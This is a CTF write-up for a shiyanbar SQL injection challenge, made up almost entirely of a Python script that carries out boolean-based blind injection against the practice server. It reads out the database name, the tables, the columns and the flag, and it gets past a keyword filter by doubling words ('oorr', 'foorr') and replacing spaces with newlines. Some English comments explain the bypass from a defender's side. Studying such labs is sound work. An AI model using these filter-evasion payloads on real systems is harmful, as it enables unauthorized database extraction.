类型:web
网址:http://www.shiyanbar.com/ctf/2009
攻击:sql注入
一句话总结：or、空格等特殊字符被过滤，使用 oorr、() 等代替
writeup
import requests
# 暴力猜解当前数据库的长度
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# for i in range(1,30):
# key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
# r = requests.post(url, data=key).text
# print(i)
# if str1 in r:
# print("the lenghth of database is %s"%i)
# break
# 暴力猜解当前数据库的名称 ctf_sql_bool_blind
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# database = ''
# for i in range(1,19):
# for j in guess:
# key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0"%(i,j)}
# r = requests.post(url, data=key).text
# print(key)
# if str1 in r:
# database += j
# print(j)
# break
# print(database)
# 暴力猜解数据表的长度 11
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# i = 1
# while True:
# flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%i
# flag = flag.replace(' ', chr(0x0a))
# key = {'id':flag}
# r = requests.post(url, data=key).text
# print(key)
# if str1 in r:
# print('the lenght of tables is %s'%i)
# break
# i += 1
# 暴力破解数据表名称 fiag@users-
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# tables = ''
# for i in range(1,12):
# for j in guess:
# flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
# flag = flag.replace(' ', chr(0x0a))
# key = {'id':flag}
# r = requests.post(url, data=key).text
# print(key)
# if str1 in r:
# tables += j
# print(j)
# break
# print(tables)
# 暴力破解数据表的列名 fl$4g
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# columns = ''
# for i in range(1,6):
# for j in guess:
# flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)
# flag = flag.replace(' ', chr(0x0a))
# key = {'id':flag}
# r = requests.post(url, data=key).text
# print(key)
# if str1 in r:
# columns += j
# print(j)
# break
# print(columns)
# 暴力猜解数据表字段长度 14
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# i = 1
# while True:
# flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='')oorr'0"%i
# flag = flag.replace(' ', chr(0x0a))
# key = {'id':flag}
# r = requests.post(url, data=key).text
# print(key)
# if str1 in r:
# print('the length of data is %s'%i)
# break
# i += 1
# 暴力猜解flag flag{haha~you-win!}
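# Boolean-based blind extraction of the `fl$4g` column, one character per
# position. The oracle is the literal 'You are in' appearing in the response
# body: when the injected comparison is true the page renders that text,
# otherwise it does not.
#
# Payload shape (see the one-line summary at the top of the writeup): the
# target filters `or`, spaces and similar tokens, so keywords are written
# doubled (`oorr`, `foorr`) -- presumably so that removing the token once
# leaves the intended keyword -- and spaces are swapped for a newline
# (chr(0x0a)) below. From the defender's side this is why a keyword
# blacklist is not a fix for SQL injection: the same request is inert
# against a parameterized query, and doubled keywords plus newline-separated
# SQL in a form field are easy to spot in request logs / WAF telemetry.

# Candidate characters tried at each position. Written '{\\}' here: the
# original '{\}' relied on an unrecognised escape sequence (Python keeps the
# backslash, so the value is the same, but 3.12+ emits a SyntaxWarning).
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\\}?!:@#$%&()[],.'
str1 = 'You are in'          # true-branch marker in the response body
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
data = ''                    # characters recovered so far

# Positions 1..19; the earlier length probe (commented out above) reported
# 14, so positions past the end of the value match none of the candidates
# and simply append nothing.
for i in range(1, 20):
    for j in guess:
        # mid(... from(i) for(1)) = j, with `oorr`/`foorr` as explained above.
        flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (i, j)
        flag = flag.replace(' ', chr(0x0a))   # newline stands in for the filtered space
        key = {'id': flag}
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            data += j        # position i is j; move on to the next position
            print(j)
            break

print(data)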
FLAG
flag{haha~you win!}